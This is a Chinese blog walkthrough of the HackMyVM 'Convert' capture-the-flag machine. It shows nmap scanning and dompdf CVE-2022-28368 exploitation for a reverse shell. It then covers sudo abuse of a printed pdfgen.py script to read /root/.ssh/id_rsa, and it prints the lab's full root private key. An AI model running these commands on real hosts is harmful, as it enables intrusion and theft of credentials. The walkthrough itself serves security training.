THM Convert

最新推荐文章于 2024-11-05 11:01:09 发布
最新推荐文章于 2024-11-05 11:01:09 发布
阅读量1k 收藏 12
点赞数 8
分类专栏: Hackmyvm 文章标签: bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vage__table/article/details/142715456
版权

简介

靶机名称:Convert

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Convert

参考wp:https://hgbe02.github.io/Hackmyvm/Convert.html
https://blog.csdn.net/tanbinn/article/details/138290844

本地环境

虚拟机:vmware and vituralbox(vmware网卡桥接至vituralbox网卡)
靶机:Convert 192.168.194.7
渗透机:kali linux 192.168.194.5

ps:vmware虚拟机网卡桥接至vituralbox上时,可能会出现dhcp分配不到的问题,试着先开启vituralbox再开启vmware,说不定能解决问题

扫描

常规,找ip,扫port、service
在这里插入图片描述
对应找到192.168.194.7的靶机,用nmap扫描

nmap -sT -sV -p- 192.168.194.7
-sT: tcp全连接扫描
-sV: 对扫描结果端口上的服务进一步探测

在这里插入图片描述
一般不会先从ssh入手,那么先看80端口
在这里插入图片描述
随手输入一个url,能够将html界面转换成pdf。那么应该就是从这个html2pdf服务下手

查资料

把pdf下下来,看看这个服务名称是什么,版本如何
在这里插入图片描述
在producer字段,显示是通过dompdf这个php插件创建的,版本是1.2.0。再google一发,找找poc。
在这里插入图片描述
或者searchexploit,对应的CVE-2022-28368提供的poc也就是51270.py这个。
在这里插入图片描述
检查dompdf路径,确实存在,确定可以尝试dompdf这个方向
在这里插入图片描述

渗透

尝试渗透,直接用这个CVE脚本应该是无法一把梭。
在这里插入图片描述
于是回去google这个CVE的原理,看看是什么地方出了问题。原理参考下面这篇文章

https://positive.security/blog/dompdf-rce

对应的,知乎上有中文版,更友好

https://zhuanlan.zhihu.com/p/633071783

CVE的点,在于服务端转换html至pdf时,会需要加载html引用的css、字体等资源文件。所以可以注入外部恶意资源文件。
同时,这个CVE的poc是针对https://github.com/positive-security/dompdf-rce项目的,和靶机请求的url有所不同,无法直接利用。
在这里插入图片描述
修改CVE脚本,成功一把梭。修改后的poc见项目https://github.com/Tw0-Y/THM/tree/main,直接用里面的dompdf脚本,就可以接到反弹shell。
在这里插入图片描述

提权

不必要的信息收集就不提。
sudo -l查看可用的提权命令
在这里插入图片描述
看到有个在用户home目录下的pdfgen.py脚本可以利用。简单分析这个脚本,就是会对传入url的界面转成pdf,但是对于url的格式没有过滤,只要不是本地文件开头即可,保存的目录不是/root /etc开头都可以。裸奔就是说

from os import path
from time import time
from weasyprint import HTML, CSS
from urllib.parse import urlparse
from argparse import ArgumentParser
from logging import basicConfig, INFO, error, info, exception

def prune_log(log_file, max_size=1):
    try:
        log_size = path.getsize(log_file) / (1024 * 1024)
        if log_size > max_size:
            with open(log_file, 'w'):
                pass
            info(f"Log file pruned. Size exceeded {max_size} MB.")
            print(f"Log file pruned. Size exceeded {max_size} MB.")
    except Exception as e:
        print(f"Error pruning log file: {e}")

log_file = '/home/eva/pdf_gen.log'
prune_log(log_file)
basicConfig(level=INFO, filename=log_file, filemode='a',
            format='%(asctime)s - %(levelname)s - %(message)s')

def is_path_allowed(output_path):
    blocked_directories = ["/root", "/etc"]
    for directory in blocked_directories:
        if output_path.startswith(directory):
            return False
    return True

def url_html_to_pdf(url, output_path):
    block_schemes = ["file", "data"]
    block_hosts = ["127.0.0.1", "localhost"]
    blocked_directories = ["/root", "/etc"]

    try:
        start_time = time()

        scheme = urlparse(url).scheme
        hostname = urlparse(url).hostname
        print(hostname)

        if scheme in block_schemes:
            error(f"{scheme} scheme is Blocked")
            print(f"Error: {scheme} scheme is Blocked")
            return

        if hostname in block_hosts:
            error(f"{hostname} hostname is Blocked")
            print(f"Error: {hostname} hostname is Blocked")
            return

        if not is_path_allowed(output_path):
            error(f"Output path is not allowed in {blocked_directories} directories")
            print(f"Error: Output path is not allowed in {blocked_directories} directories")
            return

        html = HTML(url.strip())
        html.write_pdf(output_path, stylesheets=[CSS(string='@page { size: A3; margin: 1cm }')])

        end_time = time()
        elapsed_time = end_time - start_time
        info(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")
        print(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")

    except Exception as e:
        exception(f"Error: {e}")
        print(f"Error: {e}")

if __name__ == "__main__":
    parser = ArgumentParser(description="Convert HTML content from a URL to a PDF file.")
    parser.add_argument("-U", "--url", help="URL of the HTML content to convert", required=True)
    parser.add_argument("-O", "--out", help="Output file path for the generated PDF", default="/home/eva/output.pdf")

    args = parser.parse_args()
    url_html_to_pdf(args.url, args.out)

用pdfgen.py脚本读取root用户的私钥,保存至本地,就可以直接ssh连root。

# 靶机上创建pdf文件
eva@convert:~$ sudo /usr/bin/python3 /home/eva/pdfgen.py -U /root/.ssh/id_rsa -O /var/www/html/1.pdf
PDF generated successfully at /var/www/html/1.pdf in 0.20 seconds
# 本地下载
┌──(root㉿kali)-[~/Desktop/CVE-2022-28368]
└─# wget http://192.168.194.7/1.pdf              
--2024-10-05 06:24:01--  http://192.168.194.7/1.pdf
Connecting to 192.168.194.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10635 (10K) [application/pdf]
Saving to: ‘1.pdf’

1.pdf                100%[=====================>]  10.39K  --.-KB/s    in 0s      

2024-10-05 06:24:01 (637 MB/s) - ‘1.pdf’ saved [10635/10635]

下载到本地后。
在这里插入图片描述

提取数据保存至root文件中,整理私钥最后一行的格式,并修改文件权限600。

┌──(root㉿kali)-[~/Desktop/CVE-2022-28368]
└─# cat root 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAwuT74ZxkltpDIeLfVydo0SgS+nqREGX8xfU1j8/Et0D13dLbHsPS aAVgEoDgU8/
CY5P17Lto0GouPRsjCSEEF7i8E6+0k5HOa2VCnu4wlIhDWo6xVDjhsrQuBn LUzTnU5rwUzVGH4EvZpwucdzPP8Z/
bmecJ17NETjhKfhEV9u07kiiBwZXjSYeYUUY/qCbE RJg4nKRwoR187fF2jfo7gRqCFw9LXWCUHjnQNvPqsbAAzbiG0c7Y7VjCga/
kuf12WL92G7 lFTK7BvLXlbUUVDBcbd8wiPkXTUXQsoJLWfU7uamN2vx17DWbH42PQ6Ldoo9IG9Y5Pogh1
fkJNjNLAuq3ezhqVWKuVGowRT1cQ0azjkE3y4YKoMce3ddLs+jQXgl+hncdk5WkVW/RS0p
27wx0MOPuBEiv3a5NHZew0OL8WOk+MMy4LE/coK7zumFdYUbzP2qohPzyMc/Rkpp/Pui4i
duAXaVuR5lbII+WZugD2OzbjPuRDNxu0ss0yqNZnAAAFiFbLnC5Wy5wuAAAAB3NzaC1yc2 EAAAGBAMLk+
+GcZJbaQyHi31cnaNEoEvp6kRBl/MX1NY/PxLdA9d3S2x7D0mgFYBKA4FPP
wmOT9ey7aNBqLj0bIwkhBBe4vBOvtJORzmtlQp7uMJSIQ1qOsVQ44bK0LgZy1M051Oa8FM 1Rh+BL2acLnHczz/
Gf25nnCdezRE44Sn4RFfbtO5IogcGV40mHmFFGP6gmxESYOJykcKEd
fO3xdo36O4EaghcPS11glB450Dbz6rGwAM24htHO2O1YwoGv5Ln9dli/dhu5RUyuwby15W
1FFQwXG3fMIj5F01F0LKCS1n1O7mpjdr8dew1mx+Nj0Oi3aKPSBvWOT6IIdX5CTYzSwLqt
3s4alVirlRqMEU9XENGs45BN8uGCqDHHt3XS7Po0F4JfoZ3HZOVpFVv0UtKdu8MdDDj7gR Ir92uTR2XsNDi/
FjpPjDMuCxP3KCu87phXWFG8z9qqIT88jHP0ZKafz7ouInbgF2lbkeZW
yCPlmboA9js24z7kQzcbtLLNMqjWZwAAAAMBAAEAAAGAObSMAcKJJANPAj8G6uq/xcIMUH 6u6gCQhdpzN/
gIIkxJIBtZBrRrXaJNzly7TwWCZHKAS843nBH8S9p3lrHgYNexVFDfchwn
VrQeNCmJV8k6zBrY1XucFAn2YLFqYbOAXqsMq7g6t4Yt1SCCfObp6HxxDJIUX3n0PQa8w7 PyYXDfhQiaVsO3DuPnjRT0Lyj/
TuIVTQgBUysEfP1UIXiYWsMLBqHgKi842/Q5OrQg5uia
bE75GDEbGLeBq911Jz6s4c+j7xQUe+5twaQl15dv5wh7ZAh5v7LYOVxFVnVR3kX7KqOXmE
fIqRif166x1e4QMTOUO0CqWwFbccMMmVG6fAez7D4jUQ/iDtiHELD7OEhclm7iZrRp5oH3
nGlP+l6wG2ssEpSFZI6u8FWYSJhrWcVdjURqxRWpzNnIi0oWfF2ud/Y+1W5y/x7qStdhYZ WEacCIfEQqiS2w4ZtPejTw73I/n/
vUpW+7XueGkr/FTWQvjyVok7ucVL4q+Ng6TVgdAAAA
wQCgVwiOK2Rxo4KD6vyKURe0FszrpLkSicrAu6AdS3XOz4v16a0nN1leEif4lGSRIONLso
2UEqnC3OZPKeSM+JXmm0tFYdfT1rb755BsZlySNTVh899DZJ8+OX1JC4C+vrppl/Ue98fi Y9sbg5f8xVGpQsOMsmnEhvU1/
o3kvI7JvLrx1wh/OUeWrlq2VuNfCEENQxG9OKqYQKbq4c
ywcRn27InTITqaOLbtNHziefasFMzwpbxURVo+taCmJIjhSGYAAADBAO5cicgy/Ug3XMHO xMyqu/GrhkmA1fDrqMfGy+eHDe4/
PsVGHXYpCou8p4mTP9q54yK9M22vvndCuIPcGpyM6p L3f2UijZ1uJH3EZuhldUWPJ3aAAobKnPiv5gnxGl9Aa1JZRHImOeojB/
54aUlKB6RCL96d slqM0przBaM2HUKyqWbdK5jby1gQ8F2CuDtBNXRmPNwM/hkZIalDHB70JkJs2FU06JPsTD
UqN26ZJbffqBcGoqIA1LAJzPSoIfL4HQAAAMEA0VEEa4kH/GgfDPcO2Mz2XloBGr6AJ3si 0urQbGMYhO5hs0KxzcnOw5/3/
W54oGK/lQTKkzXBx8VNsfUhvKNt0Pr4KDzNtp6wbE1DjE
xyqnjEVEgvikm+cR46awTdP93P+nH1RF8Xj4iTuHfEpZVTS8Kq3yBLpYkB/gjZ1U4IyTr3 BoG62j/
8BVupXa8NNYd2Z5EOCI8n0I9mSgHbeljNePQCJ7EZJCa1K2naUFsaZNvTb+waGe
T7JtrQ2LFUUOlTAAAADHJvb3RAY29udmVydAECAwQFBg== 
-----END OPENSSH PRIVATE KEY-----
                                                                                   
┌──(root㉿kali)-[~/Desktop/CVE-2022-28368]
└─# chmod 600 root 
                                                                                   
┌──(root㉿kali)-[~/Desktop/CVE-2022-28368]
└─# ssh root@192.168.194.7 -i root
Linux convert 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan  1 05:30:10 1970
root@convert:~#

连接root用户,提权成功!
除了运行脚本外,还可以直接覆盖此脚本为提权脚本。因为这个目录的所有权是eva用户的,eva用户只是对于pdfgen.py文件没有直接的修改权限,但是能够对其进行覆盖。为什么cp也不行。。。
在这里插入图片描述
最后用sudo运行即可提权。
在这里插入图片描述

Tw0_Y
关注
专栏目录
Linux之convert命令
Huntinux
01-22 8008
原文:http://zlb1986.iteye.com/blog/778054 转载: 强大的convert命令 convert命令可以用来转换图像的格式,支持JPG, BMP, PCX, GIF, PNG, TIFF, XPM和XWD等类型,下面举几个例子:   convert  xxx.jpg  xxx.png   将jpeg转成png文件   convert  xxx.gif
linux中convert用法
XCJJDD182652的博客
10-06 492
转: 强大的convert命令convert命令可以用来转换图像的格式,支持JPG, BMP, PCX, GIF, PNG, TIFF, XPM和XWD等类型,下面举几个例子: convert xxx.jpg xxx.png 将jpeg转成png文件 convert xxx.gif xxx.bmp 将gif转换成bmp图像 convert xxx....
linux convert命令
baidu_35289599的博客
06-13 397
强大的convert命令  convert命令可以用来转换图像的格式,支持JPG, BMP, PCX, GIF, PNG, TIFF, XPM和XWD等类型,下面举几个例子:    convert  xxx.jpg  xxx.png   将jpeg转成png文件    convert  xxx.gif   xxx.bmp  将gif转换成bmp图像    convert  xxx.tiff
convert命令
nick.wong's记事本
05-29 2143
Ubuntu 制作GIF动画命令 http://hi.baidu.com/%C0%C7%C6%C6%C0%CB/blog/item/4dcdf3f385e00d48342acc2b.html 首先(可选)压缩原图片 命令: 命令: mogrify -resample 72x72 -resize 256x256 *.JPG 然后制作动画 convert -delay
linux convert命令安装及使用
weixin_30628077的博客
09-26 1101
linux下ImageMagick安装和使用 检查系统有无安装ImageMagick shell> rpm -qa | grep ImageMagick 没有就开始安装ImageMagick shell> rpm -Uvh ImageMagick-6.3.4-10.i386.rpm 或者 shell> yum install ImageMagick ...
linux下 强大的convert命令
丁小胖的博客
03-20 2314
convert命令可以用来转换图像的格式,支持JPG, BMP, PCX, GIF, PNG, TIFF, XPM和XWD等类型,下面举几个例子:   convert  xxx.jpg  xxx.png   将jpeg转成png文件   convert  xxx.gif   xxx.bmp  将gif转换成bmp图像   convert  xxx.tiff    xxx.pcx   将tif
Linux之convert命令【转】
zzb2760715357的博客
08-21 178
本文转载自:http://zlb1986.iteye.com/blog/778054 转载:强大的convert命令convert命令可以用来转换图像的格式,支持JPG, BMP, PCX, GIF, PNG, TIFF, XPM和XWD等类型,下面举几个例子: convert xxx.jpg xxx.png 将jpeg转成png文件 convert xxx.gif x...
ImageMagick之convert命令大全
weixin_30550271的博客
08-22 225
强大的convert命令 convert命令可以用来转换图像的格式,支持JPG, BMP, PCX, GIF, PNG, TIFF, XPM和XWD等类型,下面举几个例子: convert xxx.jpg xxx.png 将jpeg转成png文件 convert xxx.gif xxx.bmp 将gif转换成bmp图像 convert xxx.tiff...
linux convert图像处理命令
weixin_34067102的博客
07-18 87
 几个简单的应用。   1、批量图像格式转换   如果想将某目录下的所有jpg文件转换为png文件,只要在命令行模式下输入:   for %f in (*.jpg) do convert “%f” “%~nf.png”   2、对所有图像进行同一操作   譬如,批量生成某目录下所有PNG图像文件的缩略图(大小为80×40):   for %f in (*.png...
postgresql使用过程中字段转换
【圆圆的世界】_CSDN专栏
01-05 5401
1、interval类型字段换算成时分秒date_part('hour', visit_times)*60*60+date_part('minute', visit_times)*60+date_part('seconds', visit_times)
用ImageMagick命令行处理图片
02-24
convert -sample 25%x25% ${img} thm${img} done ``` 这条脚本将对所有JPG文件生成四分之一大小的缩略图,并以“thm”作为前缀保存。 4. **旋转图像**:`convert -rotate 90 input.jpg output.jpg`用于将图像...
简单介绍使用 JAGS 进行蒙特卡罗模拟
甲三的博客
08-18 1882
Introduction to Monte Carlo simulation using JAGS This practical gives an introduction to the Monte Carlo method using JAGS (Just Another Gibbs Sampler). First we have to install some R packages that act as frontenda for JAGS: R2jags allows fitting JAGS m
matlab计算单位冲击响应,冲击响应谱计算的matlab程序
weixin_34746715的博客
03-19 1955
《冲击响应谱计算的matlab程序》由会员分享,可在线阅读,更多相关《冲击响应谱计算的matlab程序(7页珍藏版)》请在人人文库网上搜索。1、disp( )disp( srs.m ver 2.0 July 3, 2006)disp( by Tom Irvine Email: tomirvineaol.com)disp( )disp( This program calculates the sho...
GIT GUI和 GIT bash区别
还在活水泥的未来包工头
11-05 421
它提供了一个命令行界面(CLI)来使用 Git,支持常规的 Git 命令和 Bash 命令(如 ls, cd, rm 等)。总的来说,Git GUI 是一个方便的图形化工具,适合轻量级和日常的 Git 操作;而 Git Bash 则是一个强大的命令行工具,适合开发者进行深入的 Git 操作和自动化脚本。Git GUI 和 Git Bash 都是与 Git 版本控制工具相关的用户界面,但它们有不同的功能和用途。功能范围 提供常见的 Git 操作,简化复杂操作 完全支持所有 Git 命令和操作,功能全面。
高分springboot毕设+vue视频点播系统设计与实现-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue的视频点播系统设计与实现,旨在为计算机相关专业的大学生提供一个完整的毕业设计案例,同时也适合Java学习者进行项目实战练习。该项目不仅涵盖了前后端开发技术,还深入探讨了视频流处理、用户管理和支付系统等关键功能模块。 在系统设计上,后端采用Spring Boot框架,利用其快速开发和部署的优势,实现了高效的服务器端逻辑处理。前端则使用Vue.js,通过其灵活的数据绑定和组件化开发特性,构建了用户友好的交互界面。系统支持多种视频格式的上传与播放,确保了广泛的兼容性。 此外,项目还集成了用户认证与授权机制,保障了系统的安全性。支付功能的加入,使得系统能够模拟真实的商业环境,为用户提供付费点播服务。通过这个项目,学习者可以深入理解前后端协同工作原理,掌握视频点播系统的核心技术和实现方法。
typora软件Windows下编辑Markdown文档神器!截止目前最好用的Markdown编辑器!安装即可使用!无需注册!
11-09
亲测好用!Windows下的Markdown文档编辑神器!一键安装就可使用,无需注册!安装即用。
Win32烧录工具-Portable版本
11-09
Win32烧录工具-Portable版本
Java Script 笔记
最新发布
11-09
Java Script 笔记
THM3060射频匹配与天线设计详析
THM3060 RF匹配电路与天线设计指南是一份详细的文档,针对THM3060芯片的应用提供技术指导。THM3060是一款多功能非接触卡读写器芯片,遵循ISO/IEC 14443 Type A/B和ISO/IEC 15693标准,支持多种通信速率,包括高达848...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值